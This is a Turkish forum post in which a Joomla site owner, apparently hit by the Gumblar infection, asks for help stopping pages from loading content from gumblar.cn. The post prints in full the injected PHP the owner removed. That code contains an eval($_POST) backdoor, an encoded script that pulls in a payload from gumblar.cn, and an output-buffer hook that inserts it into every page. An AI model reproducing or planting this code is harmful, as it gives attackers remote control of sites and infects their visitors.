arkadaşlar sitem istemediğim halde gumblar.cn isimli siteden veri aktarılıyor diyor. site açılırken tarayıcının durum çubuğu kısmında. daha önceden olmayan sonradan oluşan bir kod yakaladım başlangıca yerleşmiş. kodu kaldırdım. kod aynen böyle ;

Alıntı
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbihYUjUpe2V2YWwodW5lc2NhcGU oKCd2YXImMjBhJjNkJjIyJjUzY3ImNjkmNzB0RW5nJjY5bmUmM jImMmNiJjNkJjIyVmVyc2lvbigmMjkmMmImMjImMmNqJjNkJjI yJjIyJjJjdSYzZCY2ZWF2aWdhJjc0byY3MiYyZXVzZXJBZ2Vud CYzYmkmNjYoKHUmMmVpbiY2NGV4T2YoJjIyV2luJjIyJjI5JjN lJjMwJjI5JjI2JjI2JjI4dSYyZWluJjY0ZSY3OE8mNjYoJjIyT lQmMjA2JjIyKSYzYyYzMCkmMjYmMjYmMjhkJjZmY3VtZW4mNzQ mMmVjJjZmbyY2YmkmNjUmMmVpbmRleCY0ZmYoJjIybWllayYzZ DEmMjIpJjNjMCkmMjYmMjYmMjh0eXAmNjVvJjY2JjI4eiY3MiY 3NnomNzRzKSYyMSYzZHR5cGVvJjY2JjI4JjIyQSYyMikpKSY3Y nomNzJ2JjdhdCY3MyYzZCYyMkEmMjImM2JldmFsKCYyMmlmKCY 3N2luZG93JjJlJjIyK2ErJjIyKSY2YSYzZGorJjIyK2ErJjIyT WFqb3ImMjIrJjYyK2ErJjIyTWlubyY3MiYyMitiK2ErJjIyQnU mNjlsZCYyMitiKyYyMmomM2ImMjIpJjNiZCY2ZmN1bSY2NW50J jJld3JpdCY2NSYyOCYyMiYzYyY3MyY2M3JpJjcwJjc0JjIwc3J jJjNkJjJmJjJmZ3VtJjYyJjZjYXImMmVjbiYyZiY3MiY3MyY3M yYyZiYzZmkmNjQmM2QmMjImMmJqKyYyMiYzZSYzYyY1YyYyZnN jcmkmNzAmNzQmM2UmMjImMjkmM2ImN2QnKS5yZXBsYWNlKFhSN SwnJScpKSl9KSgvJi9nKTsKIC0tPjwvc2NyaXB0Pg=='));fun ction tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
ama arkadaşlar hala gumblar.cn isimli zararlı siteden veri alıyor sitem. joomla kullanıyorum ve gumblar.cn ismi geçmiyor. ctrl + f ile tarattım yok böyle bişey. addthis ve rss kullanıyorum sitemde sorun burdan olabilir mi? buna karşı nasıl bir önlem almalıyım arkadaşlar? google tarafından cezalandırılmak istemiyorum zararlı site uyarısı almak istemiyorum arama sonuçlarımda. lütfen yardım edin??